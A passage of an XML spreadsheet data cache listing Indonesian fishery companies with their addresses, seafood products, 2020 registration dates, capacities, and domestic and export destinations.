    <s v="China, Malaysia, Sri Lanka, Thailand"/>
  </r>
  <r>
    <n v="19363"/>
    <x v="156"/>
    <s v="UD. ANUGERAH BINTANG CEMERLANG"/>
    <s v="Jl. Bambu Runcing No.99, Kel. Bonto Talassa, Kec. Simbang, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Beku"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="288000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Ambon"/>
    <s v="Sri Lanka, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19909"/>
    <x v="157"/>
    <s v="CV. ASRYL PERKASA"/>
    <s v="Perumahan Citra Sanggalea Indah D4 No.4, Kel. Taroada, Kec. Turikale, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-02-21T00:00:00"/>
    <n v="108000"/>
    <s v="Kota Jakarta Pusat, Kota Denpasar"/>
    <s v="Japan, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="16890"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Hidup"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="16896"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cacing Laut Hidup"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20329"/>
    <x v="158"/>
    <s v="PT. DUTA BUANA PACIFIC"/>
    <s v="Komplek PPN Tanjungpandan, Jl. RE Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Kepiting Lunak Beku"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20497"/>
    <x v="159"/>
    <s v="PT, NELAYAN MITRA MANDIRI"/>
    <s v="Komplek PPN Tanjungpandan, Jl, RE Martadinata, Kel, Kota, Kec, Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Pelagis Beku (Selayar, Tenggiri)"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="153577.29999999999"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20498"/>
    <x v="159"/>
    <s v="PT. NELAYAN MITRA MANDIRI"/>
    <s v="Komplek PPN Tanjungpandan, Jl. RE Martadinata, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Siput Beku"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="20638"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20499"/>
    <x v="159"/>
    <s v="PT, NELAYAN MITRA MANDIRI"/>
    <s v="Komplek PPN Tanjungpandan, Jl, RE Martadinata, Kel, Kota, Kec, Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap, Kaci-kaci, Ekor Kuning)"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="121740.4"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20500"/>
    <x v="159"/>
    <s v="PT. NELAYAN MITRA MANDIRI"/>
    <s v="Komplek PPN Tanjungpandan, Jl. RE Martadinata, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Udang Beku"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="62608"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20501"/>
    <x v="159"/>
    <s v="PT, NELAYAN MITRA MANDIRI"/>
    <s v="Komplek PPN Tanjungpandan, Jl, RE Martadinata, Kel, Kota, Kec, Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Kepiting Beku"/>
    <d v="2020-04-06T00:00:00"/>
    <s v="06/06/1900  19,06,00"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="19273"/>
    <x v="160"/>
    <s v="PT. RIKA RAYHAN MANDIRI"/>
    <s v="Jl. Kima IV Kav P3A, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="68000000"/>
    <s v="Kabupaten Pinrang"/>
    <s v="Chile, China, Denmark, United States"/>
  </r>
  <r>
    <n v="16712"/>
    <x v="161"/>
    <s v="CV. DUTA RATU PERTIWI LANCAR"/>
    <s v="Jl. Dermaga II RT 003 RW 019, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Salem, Selar, Layang, Tenggiri)"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="16845"/>
    <x v="162"/>
    <s v="PT, SIGER JAYA ABADI"/>
    <s v="Jl, Raya Tanjung Bintang No,99, Kel, Serdang, Kec, Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Daging Rajungan Pasteurisasi Dalam Kaleng, Cup Plastik, Kantung Plastik, Pouch Aluminium"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="224658.84"/>
    <m/>
    <s v="China, United Kingdom, United States"/>
  </r>
  <r>
    <n v="20285"/>
    <x v="91"/>
    <s v="PT. TOBA SURIMI INDUSTRIES"/>
    <s v="Jl. Pulau Pinang 2, Kawasan Industri Medan II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Kakatua, Red Sea Bream, Jenggot)"/>
    <d v="2020-06-15T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="Italy, United Kingdom, United States"/>
  </r>
  <r>
    <n v="19302"/>
    <x v="112"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MIMIKA"/>
    <s v="Jl. Kawasan Industri Perikanan Poumako, Kel. Poumako, Kec. Mimika, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Deho, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-01-29T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kabupaten Mimika"/>
    <s v="China, Korea, Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="19366"/>
    <x v="163"/>
    <s v="PT. MINA TIMUR INDONESIA"/>
    <s v="Jl. Pendidikan No.8, Kel. Bontolanra, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="50"/>
    <m/>
    <s v="China, Korea, Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="19429"/>
    <x v="73"/>
    <s v="PT. MANDIRI SUKSES JAYA PERKASA"/>
    <s v="Jl. Pusat Pemasaran Ikan No.74,75,76 Pelabuhan Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Pisang-pisang, Anggoli, Kerapu, Layur, Bawal, Kakap, Kurisi)"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="1200"/>
    <m/>
    <s v="Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19434"/>
    <x v="29"/>
    <s v="PT. MARITIM NUSANTARA PERKASA"/>
    <s v="Kawasan Pelabuhan Perikanan Nizam Zachman Jl. Muara Baru Ujung Blok T No.8 RT 020 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Kuwe, Kembung, Lemadang, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-03-12T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="20164"/>
    <x v="164"/>
    <s v="PT. SARI SEGAR LAUT INDONESIA"/>
    <s v="Jl. Ikan Tuna Raya Timur I Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Hong Kong, Singapore, United States"/>
  </r>
  <r>
    <n v="19639"/>
    <x v="165"/>
    <s v="PT. CENTRALPERTIWI BAHARI"/>
    <s v="Kampung Adiwarna, Kec. Gedung Meneng, Kabupaten Tulang Bawang&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Seafood Bernilai Tambah Beku (Udang Berlapis Tepung, Wonton Udang, Udang Goreng, Popcorn Udang, Nugget Udang, Siomay Udang, Udang Roll, Kue Udang, Bakwan Udang, Tempura Udang)   "/>
    <d v="2020-02-10T00:00:00"/>
    <n v="480000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Japan, Philippines, United Kingdom"/>
  </r>
  <r>
    <n v="19455"/>
    <x v="166"/>
    <s v="PT. TRIDAYA ERAMINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Blok K No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Air Tawar Beku (Lele, Nila)"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="Germany, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20105"/>
    <x v="7"/>
    <s v="PT. SINAR SEJAHTERA SENTOSA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Saudi Arabia, United Arab Emirates"/>
  </r>
  <r>
    <n v="21236"/>
    <x v="167"/>
    <s v="PT. INDONESIA BRAZIL COFFEE"/>
    <s v="Jl. Gatot Subroto Km 6,2 No.89 RT 003 RW 006, Kel. Keroncong, Kec. Jatiuwung, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sarden Kaleng, Makerel Kaleng"/>
    <d v="2020-09-28T00:00:00"/>
    <n v="720000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="Central African Republic, Morocco"/>
  </r>
  <r>
    <n v="21060"/>
    <x v="168"/>
    <s v="PT. KARYA MANUNGGAL PRIMA SUKSES"/>
    <s v="Jl. Tratas No. 37, Kel. Kedungringin, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sarden Kaleng"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="720000"/>
    <s v="Kabupaten Bandung"/>
    <s v="Malaysia, Singapore, South Africa"/>
  </r>
  <r>
    <n v="20220"/>
    <x v="169"/>
    <s v="CV. GIOVANNI SUKSES MAKMUR"/>
    <s v="Jl. Berbek Industri 5 No.1, Kel. Berbek, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan, Netherlands, United States"/>
  </r>
  <r>
    <n v="20386"/>
    <x v="104"/>
    <s v="PT. ERA MANDIRI CEMERLANG TBK"/>
    <s v="Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kuwe, Anggoli, Janahan, Kerapu, Layur, Sukang, Kakatua, Kakap, Kurisi, Ekor Kuning, Barramundi)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="India, Netherlands, United States"/>
  </r>
  <r>
    <n v="20389"/>
    <x v="104"/>
    <s v="PT. ERA MANDIRI CEMERLANG TBK"/>
    <s v="Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerupuk Kulit Ikan"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="India, Netherlands, United States"/>
  </r>
  <r>
    <n v="20577"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Beku"/>
    <d v="2020-06-25T00:00:00"/>
    <n v="55097"/>
    <m/>
    <s v="Australia, Lebanon, United States"/>
  </r>
  <r>
    <n v="20201"/>
    <x v="92"/>
    <s v="CV, SUMBER LAUT REJEKI"/>
    <s v="Jl, Pelelangan Baru Dermaga 1 No,28-29 Muara Angke, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Salem, Cakalang, Tenggiri)"/>
    <d v="2020-05-13T00:00:00"/>
    <n v="1200000"/>
    <s v="Kota Jakarta Utara, Kabupaten Tegal"/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="16891"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Keong Hidup"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="16897"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Belut Beku"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20523"/>
    <x v="110"/>
    <s v="PT. CILACAP SAMUDERA FISHING INDUSTRY"/>
    <s v="Kawasan Pelabuhan PPS Nizam Zachman Blok K 7D, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-05-01T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20525"/>
    <x v="110"/>
    <s v="PT. CILACAP SAMUDERA FISHING INDUSTRY"/>
    <s v="Kawasan Pelabuhan PPS Nizam Zachman Blok K 7D, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Sirip Hiu Beku"/>
    <d v="2020-05-01T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21130"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kepiting Beku"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="200000"/>
    <s v="Kabupaten Sidoarjo"/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21131"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Rajungan Beku"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="200000"/>
    <s v="Kabupaten Sidoarjo"/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20571"/>
    <x v="86"/>
    <s v="PT. INDOSUKSES MANDIRI ABADI"/>
    <s v="Desa Molowahu, Kec. Tibawa, Kabupaten Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Bandeng Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surabaya"/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20489"/>
    <x v="170"/>
    <s v="BIDIN"/>
    <s v="Jl. Pelantar I No.59 H RT 003 RW 008, Kel. Tanjung Pinang Kota, Kec. Tanjung Pinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Kerapu, Bawal, Kakap, Kaci-kaci, Timun, Barramundi)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="9000"/>
    <s v="Kota Batam"/>
    <s v="Bonaire, Sint Eustatius and Saba"/>
  </r>
  <r>
    <n v="19592"/>
    <x v="171"/>
    <s v="PT. HALINDO BERJAYA MANDIRI"/>
    <s v="Jl. Burhanuddin LK II, Kel. Perjuangan, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Sarden, Layang, Tenggiri)"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19593"/>
    <x v="171"/>
    <s v="PT. HALINDO BERJAYA MANDIRI"/>
    <s v="Jl. Burhanuddin LK II, Kel. Perjuangan, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Mata Besar, Malong, Gulama, Kambing-kambing, Biji Nangka, Bawal, Samge, Kakap, Ayam-ayam)"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19704"/>
    <x v="172"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Sawocangkring No.02 RT 01 RW 01, Kel. Sawocangkring, Kec. Wonoayu, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Surimi Beku"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="125000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19705"/>
    <x v="172"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Sawocangkring No.02 RT 01 RW 01, Kel. Sawocangkring, Kec. Wonoayu, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Kuniran, Layur, Kakap, Ekor Kuning)"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19706"/>
    <x v="172"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Sawocangkring No.02 RT 01 RW 01, Kel. Sawocangkring, Kec. Wonoayu, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="70000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19707"/>
    <x v="172"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Sawocangkring No.02 RT 01 RW 01, Kel. Sawocangkring, Kec. Wonoayu, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Bakso Cumi-cumi, Nugget Ikan)"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20184"/>
    <x v="139"/>
    <s v="PT. DHARMINDO SAMUDRA ABADI"/>
    <s v="Jl. Raya Sarang-Tuban No.89, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Makerel, Marlin, Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2021-01-21T00:00:00"/>
    <n v="2700"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20275"/>
    <x v="173"/>
    <s v="PT. DYTONA DELI KRISP"/>
    <s v="Jl. Mutiara III, Kel. Curug, Kec. Gunung Sindur, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Asin Goreng"/>
    <d v="2020-08-13T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20327"/>
    <x v="174"/>
    <s v="PT, MISAJA MITRA"/>
    <s v="Jl, Raya Pati - Tayu Km 18, Kel, Waturoyo, Kec, Margoyoso, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="1111887.05"/>
    <m/>
    <s v="Japan, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20726"/>
    <x v="175"/>
    <s v="CV. MARKINDO RAYA"/>
    <s v="Desa Pale, Kec. Tobelo Selatan, Kabupaten Halmahera Utara&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Kayu"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="82740"/>
    <m/>
    <s v="Japan, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21128"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Beku"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19334"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No.23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Tanpa Duri"/>
    <d v="2020-01-30T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Makassar"/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="18099"/>
    <x v="177"/>
    <s v="PT. LONTARA JAYA SAKTI"/>
    <s v="Jl. Pasar Ikan Beba, Kel. Tamasaju, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Air Tawar Beku (Lele, Gurami, Mujair, Patin, Gabus, Nila)"/>
    <d v="2020-01-28T00:00:00"/>
    <n v="324"/>
    <m/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="18191"/>
    <x v="177"/>
    <s v="PT. LONTARA JAYA SAKTI"/>
    <s v="Jl. Pasar Ikan Beba, Kel. Tamasaju, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Air Tawar Segar (Lele, Gurami, Mujair, Patin, Gabus, Nila)"/>
    <d v="2020-01-28T00:00:00"/>
    <n v="324"/>
    <m/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="19330"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No.23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Kepiting Segar"/>
    <d v="2020-01-30T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="19331"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No.23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Segar"/>
    <d v="2020-01-30T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="19332"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No.23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Kepiting Beku"/>
    <d v="2020-01-30T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="19333"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No.23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-01-30T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="20301"/>
    <x v="178"/>
    <s v="PT. BUMI PANGAN UTAMA"/>
    <s v="Jl. Millenium Raya Blok L1 No.1 Kawasan Industri Millenium, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="3963400"/>
    <m/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="20302"/>
    <x v="178"/>
    <s v="PT. BUMI PANGAN UTAMA"/>
    <s v="Jl. Millenium Raya Blok L1 No.1 Kawasan Industri Millenium, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="1698600"/>
    <m/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="20757"/>
    <x v="179"/>
    <s v="PT, GEMA ISTA RAYA"/>
    <s v="Jl, Tembero No, 17, Kel, Tanggulangin, Kec, Kejayan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Teri, Lemuru, Mata Besar, Tongkol, Terbang, Kuwe)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="720000"/>
    <m/>
    <s v="Congo, Ghana, Nigeria, Thailand"/>
  </r>
  <r>
    <n v="20761"/>
    <x v="179"/>
    <s v="PT, GEMA ISTA RAYA"/>
    <s v="Jl, Tembero No, 17, Kel, Tanggulangin, Kec, Kejayan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Bawal, Gulama, Lencam, Sebelah, Senangin)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="720000"/>
    <m/>
    <s v="Congo, Ghana, Nigeria, Thailand"/>
